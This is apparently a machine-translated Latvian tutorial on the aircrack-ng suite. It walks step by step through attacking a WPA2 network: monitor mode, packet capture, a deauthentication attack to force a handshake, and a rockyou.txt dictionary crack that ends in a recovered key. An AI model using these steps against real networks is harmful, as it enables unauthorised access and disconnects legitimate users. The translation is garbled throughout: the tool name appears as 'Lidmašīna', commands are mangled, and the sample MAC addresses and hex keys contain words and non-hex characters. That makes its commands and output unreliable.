Lidmašīna ir pilns programmatūras komplekts, kas paredzēts WiFi tīkla drošības pārbaudei. Tas nav tikai viens rīks, bet gan rīku kopums, no kuriem katrs veic noteiktu mērķi. Var strādāt ar dažādām wifi drošības jomām, piemēram, piekļuves punkta uzraudzību, testēšanu, uzbrukumu tīklam, wifi tīkla uzlaušanu un tā pārbaudi. Aircrack galvenais mērķis ir pārtvert paketes un atšifrēt jauktās paroles. Tas atbalsta gandrīz visas jaunās bezvadu saskarnes. Lidmašīna ir novecojusi rīku komplekta Aircrack uzlabota versija, ng attiecas uz Jauna paaudze . Daži no brīnišķīgajiem rīkiem, kas darbojas kopā, veicot lielāku uzdevumu.
Airmon:
Airmon-ng ir iekļauts aircrack-ng komplektā, kas tīkla saskarnes karti ievieto monitora režīmā. Tīkla kartes parasti pieņem tikai tām paredzētas paketes, kā noteikts NIC MAC adresē, taču, izmantojot airmon-ng, tiks pieņemtas arī visas bezvadu paketes, neatkarīgi no tā, vai tās ir paredzētas viņiem vai nē. Jums vajadzētu būt iespējai noķert šīs paketes, nesaistot vai autentificējot piekļuves punktu. To izmanto, lai pārbaudītu piekļuves punkta statusu, ievietojot tīkla interfeisu monitora režīmā. Pirmkārt, ir jākonfigurē bezvadu kartes, lai ieslēgtu monitora režīmu, pēc tam nogaliniet visus fona procesus, ja domājat, ka kāds process to traucē. Pēc procesu pārtraukšanas monitora režīmu var iespējot bezvadu saskarnē, izpildot tālāk norādīto komandu.
[aizsargāts ar e -pastu]: ~ $sudoairmon-ng start wlan0#
Varat arī atspējot monitora režīmu, jebkurā brīdī apturot airmon-ng, izmantojot tālāk norādīto komandu.
[aizsargāts ar e -pastu]: ~ $sudoairmon-ng stop wlan0#Gaisa nosūcējs:
Airodump-ng tiek izmantots, lai uzskaitītu visus apkārtējos tīklus un apskatītu vērtīgu informāciju par tiem. Airodump-ng pamatfunkcija ir iepakot paketes, tāpēc tā būtībā ir ieprogrammēta, lai pārņemtu visas mums apkārt esošās paketes, kamēr tās tiek novietotas monitora režīmā. Mēs to izmantosim pret visiem apkārt esošajiem savienojumiem un apkoposim datus, piemēram, tīklam pievienoto klientu skaitu, to atbilstošās mac adreses, šifrēšanas stilu un kanālu nosaukumus, un pēc tam sāksim mērķauditorijas atlasi mūsu mērķa tīklā.
Ierakstot komandu airodump-ng un piešķirot tam tīkla interfeisa nosaukumu kā parametru, mēs varam aktivizēt šo rīku. Tajā tiks uzskaitīti visi piekļuves punkti, datu pakešu daudzums, izmantotās šifrēšanas un autentifikācijas metodes un tīkla nosaukums (ESSID). No uzlaušanas viedokļa Mac adreses ir vissvarīgākie lauki.
[aizsargāts ar e -pastu]: ~ $sudoairodump-ng wlx0mon
Lidmašīna:
Aircrack tiek izmantots paroļu uzlaušanai. Pēc visu pakešu uztveršanas, izmantojot airodump, mēs varam uzlauzt atslēgu ar lidmašīnu. Tas uzlauž šīs atslēgas, izmantojot divas metodes PTW un FMS. PTW pieeja tiek veikta divos posmos. Sākumā tiek izmantotas tikai ARP paketes, un tikai tad, ja pēc meklēšanas atslēga nav sašķelta, tā izmanto visas pārējās uztvertās paketes. PTW pieejas plus ir tas, ka ne visas paketes tiek izmantotas plaisāšanai. Otrajā pieejā, t.i., FMS, atslēgas uzlaušanai mēs izmantojam gan statistiskos modeļus, gan brutālā spēka algos. Var izmantot arī vārdnīcas metodi.
Aireplay:
Airplay-ng ievieš paketes bezvadu tīklā, lai izveidotu vai paātrinātu trafiku. Aireplay-ng var uztvert paketes no diviem dažādiem avotiem. Pirmais ir tiešais tīkls, bet otrais ir paketes no jau esošā pcap faila. Airplay-ng ir noderīgs deautentifikācijas uzbrukuma laikā, kura mērķis ir bezvadu piekļuves punkts un lietotājs. Turklāt jūs varat veikt dažus uzbrukumus, piemēram, kafijas latte uzbrukumu, izmantojot airplay-ng-rīku, kas ļauj iegūt atslēgu no klienta sistēmas. To var panākt, noķerot ARP paketi un pēc tam manipulējot ar to un nosūtot to atpakaļ sistēmai. Pēc tam klients izveidos paketi, kuru var uzņemt ar airodump, un aircrack uzlauž šīs modificētās paketes atslēgu. Dažas citas airplay-ng uzbrukuma iespējas ir choppop, fragments arepreplay utt.
Gaisa bāze:
Airbase-ng tiek izmantots, lai pārveidotu iebrucēja datoru par apdraudētu savienojuma punktu, lai citi varētu izveidot saiti. Izmantojot Airbase-ng, jūs varat apgalvot, ka esat likumīgs piekļuves punkts, un veikt uzbrukumus starp cilvēkiem, kas ir pievienoti jūsu tīklam. Šāda veida uzbrukumus sauc par ļaunajiem dvīņu uzbrukumiem. Pamatlietotājiem nav iespējams atšķirt legālu piekļuves punktu un viltus piekļuves punktu. Tātad ļaunie dvīņu draudi ir vieni no visdraudīgākajiem bezvadu draudiem, ar kuriem mēs šodien saskaramies.
Airolib-ng:
Airolib paātrina uzlaušanas procesu, saglabājot un pārvaldot paroļu sarakstus un piekļuves punktu. Šīs programmas izmantotā datu bāzes pārvaldības sistēma ir SQLite3, kas lielākoties ir pieejama visās platformās. Paroles uzlaušana ietver pāra galvenās atslēgas aprēķinu, caur kuru tiek iegūta privātā pārejas atslēga (PTK). Izmantojot PTK, jūs varat noteikt kadra ziņojuma identifikācijas kodu (MIC) konkrētai paketei un teorētiski atrast, ka MIC ir līdzīgs pakotnei, tādēļ, ja PTK bija taisnība, arī PMK bija taisnība.
Lai skatītu datu bāzē saglabātos paroļu sarakstus un piekļuves tīklus, ierakstiet šādu komandu:
[aizsargāts ar e -pastu]: ~ $sudoairolib-ng testdatabase-statistikaŠeit testa datu bāze ir db, kurai vēlaties piekļūt vai kuru izveidot, un –stats ir darbība, kuru vēlaties tajā veikt. Datu bāzes laukos varat veikt vairākas darbības, piemēram, piešķirt maksimālu prioritāti kādam SSID vai tamlīdzīgi. Lai izmantotu airolib-ng ar aircrack-ng, ievadiet šādu komandu:
[aizsargāts ar e -pastu]: ~ $sudolidmašīnas plaisa-rtestdatabase wpa2.eapol.capŠeit mēs izmantojam jau aprēķinātos PMK, kas saglabāti testa datu bāze lai paātrinātu paroļu uzlaušanas procesu.
WPA/WPA2 plaisāšana, izmantojot Aircrack-ng:
Apskatīsim nelielu piemēru tam, ko aircrack-ng var paveikt, izmantojot dažus lieliskus rīkus. Mēs uzlaužam WPA/WPA2 tīkla iepriekš koplietoto atslēgu, izmantojot vārdnīcas metodi.
Pirmā lieta, kas mums jādara, ir uzskaitīt tīkla saskarnes, kas atbalsta monitora režīmu. To var izdarīt, izmantojot šādu komandu:
[aizsargāts ar e -pastu]: ~ $sudoairmon-ngPHY interfeisa draivera mikroshēmojums
Phy0 wlx0 rtl8xxxu Realtek Semiconductor Corp.
Mēs varam redzēt saskarni; tagad mums ir jānovieto atrastā tīkla saskarne (wlx0) monitora režīmā, izmantojot šādu komandu:
[aizsargāts ar e -pastu]: ~ $sudoairmon-ng start wlx0
Tas ir iespējojis monitora režīmu saskarnē ar nosaukumu wlx0mon .
Tagad mums jāsāk klausīties blakus esošo maršrutētāju pārraides, izmantojot mūsu tīkla saskarni, kuru esam ievietojuši monitora režīmā.
[aizsargāts ar e -pastu]: ~ $sudoairodump-ng wlx0monCH5 ][Pagājis:30s][ 2020-12-02 00:17
BSSID PWR bākas#Data, #/s CH MB ENC CIPHER AUTH ESSID
E4: 6F:13: 04: CE:31 -Četri, pieci 62 27 0 154e WPA2 CCMP PSK CrackIt
C4: E9:84:76:10: BE-63 77 0 0 654e. WPA2 CCMP PSK Hackme
C8: 3A:35: A0: 4E: 01-63 84 0 0 854e WPA2 CCMP PSK Net07
74: DOD:88: FA:38: 02-68 28 2 0 vienpadsmit54e WPA2 CCMP PSK TP-Link_3802
BSSID STATION PWR Rate Lost Frames Probe
E4: 6F:13: 04: CE:315C: 3A:Četri, pieci: D7: EA: 8B -3 0- 1e8 5
E4: 6F:13: 04: CE:31C4:67: D3: C2: CD: D7 -331e-6e0 3
E4: 6F:13: 04: CE:315C: C3: 07:56:61: EF -35 0-1 0 6
E4: 6F:13: 04: CE:31BC:91: B5: F8: 7E: D5 -390e-1 1002 13
Mūsu mērķa tīkls ir Crackit šajā gadījumā, kas pašlaik darbojas 1. kanālā.
Šeit, lai uzlauztu mērķa tīkla paroli, mums ir jāuztver četrvirzienu rokasspiediens, kas notiek, kad ierīce mēģina izveidot savienojumu ar tīklu. Mēs varam to uzņemt, izmantojot šādu komandu:
[aizsargāts ar e -pastu]: ~ $sudogaisa nosūcējs-c 1--bssid E4: 6F:13: 04: CE:31 -iekšā /mājas wlx0-c : Kanāls
- Bss : Bssid no mērķa tīkla
-iekšā : Tās direktorijas nosaukums, kurā tiks ievietots pcap fails
Tagad mums jāgaida, kamēr ierīce izveidos savienojumu ar tīklu, taču ir labāks veids, kā uzņemt rokasspiedienu. Mēs varam deautentificēt ierīces AP, izmantojot deautentifikācijas uzbrukumu, izmantojot šādu komandu:
[aizsargāts ar e -pastu]: ~ $sudoaireplay-ng-0 -uzE4: 6F:13: 04: CE:31uz : Bssid no mērķa tīkla
-0 : deautentifikācijas uzbrukums
Mēs esam atvienojuši visas ierīces, un tagad mums jāgaida, līdz ierīce izveidos savienojumu ar tīklu.
CH1 ][Pagājis:30s][ 2020-12-02 00:02][WPA rokasspiediens: E4: 6F:13: 04: CE:31BSSID PWR RXQ bākas#Dati, #/s CH MB ENC CIPHER AUTH E
E4: 6F:13: 04: CE:31 -47 1 228 807 36 154. WPA2 CCMP PSK P
BSSID STATION PWR Rate Lost Frames Probe
E4: 6F:13: 04: CE:31BC:91: B5: F8: 7E: D5 -35 0-1 0 1
E4: 6F:13: 04: CE:315C: 3A:Četri, pieci: D7: EA: 8B -290e- 1e0 22
E4: 6F:13: 04: CE:31 88:28: B3:30:27: 7E -310e-1 0 32
E4: 6F:13: 04: CE:31C4:67: D3: C2: CD: D7 -350e- 6e263 708CrackIt
E4: 6F:13: 04: CE:31D4: 6A: 6A:99: ED: E3 -350e- 0e0 86
E4: 6F:13: 04: CE:315C: C3: 07:56:61: EF -37 0- 1e0 1
Mēs saņēmām trāpījumu, un, aplūkojot augšējo labo stūri tieši blakus laikam, mēs redzam, ka ir notverts rokasspiediens. Tagad skatieties norādītajā mapē ( /mājas mūsu gadījumā) a .pcap failu.
Lai uzlauztu WPA atslēgu, mēs varam izmantot šādu komandu:
[aizsargāts ar e -pastu]: ~ $sudolidmašīnas plaisa-2 -iekšārockyou.txt-bE4: 6F:13: 04: CE:31rokasspiediens.vāciņšb: mērķa tīkla Bssid
-a2: WPA2 režīms
Rockyou.txt: vārdnīcafailulietotas
Handshake.cap:failu kurusatur notvertu rokasspiedienu
Lidmašīna1.2beta3
[00:01:49] 10566pārbaudītas atslēgas(1017.96uz/s)
ATSLĒGTS! [tu mani pieķēri]
Galvenā atslēga: 8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B 7B 6D
0C 06 08 ED BC 6B H7 J8 K1 A0896B 7B B F7 6FpiecdesmitC
Pārejoša atslēga: 4D C4 5R 6T76 996G 7H 8D EC
H7 J8 K1 A0896B 7B 6D AF 5B 8D 2D A0896B
A5 BD K1 A0896B 0C 08 0C 06 08 ED BC 6B H7 J8 K1 A089
8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B
MAC: CB 5A F8 CE62B2 1B F7 6FpiecdesmitC025 62E9 5D71
Mūsu mērķa tīkla atslēga ir veiksmīgi uzlauzta.
Secinājums:
Bezvadu tīkli ir visur, un tos izmanto ikviens uzņēmums, sākot no darbiniekiem, kuri izmanto viedtālruņus, līdz rūpnieciskām vadības ierīcēm. Saskaņā ar pētījumiem 2021. gadā gandrīz vairāk nekā 50 procenti no interneta trafika pārsniegs WiFi. Bezvadu tīkliem ir daudz priekšrocību, komunikācija ārpus durvīm, ātra piekļuve internetam vietās, kur ir gandrīz neiespējami novietot vadus, var paplašināt tīklu, neinstalējot kabeļus. jebkuram citam lietotājam un var viegli savienot jūsu mobilās ierīces ar mājas birojiem, kamēr neesat tur.
Neskatoties uz šīm priekšrocībām, ir liela jautājuma zīme par jūsu privātumu un drošību. Tā kā šie tīkli; pārraides diapazonā maršrutētāji ir pieejami ikvienam, tiem var viegli uzbrukt un jūsu dati var tikt viegli apdraudēti. Piemēram, ja esat izveidojis savienojumu ar kādu publisku Wi -Fi, ikviens, kas ir pievienojies šim tīklam, var viegli pārbaudīt jūsu tīkla trafiku, izmantojot kādu izlūkošanas informāciju un izmantojot lieliskus pieejamos rīkus, un pat izmest to.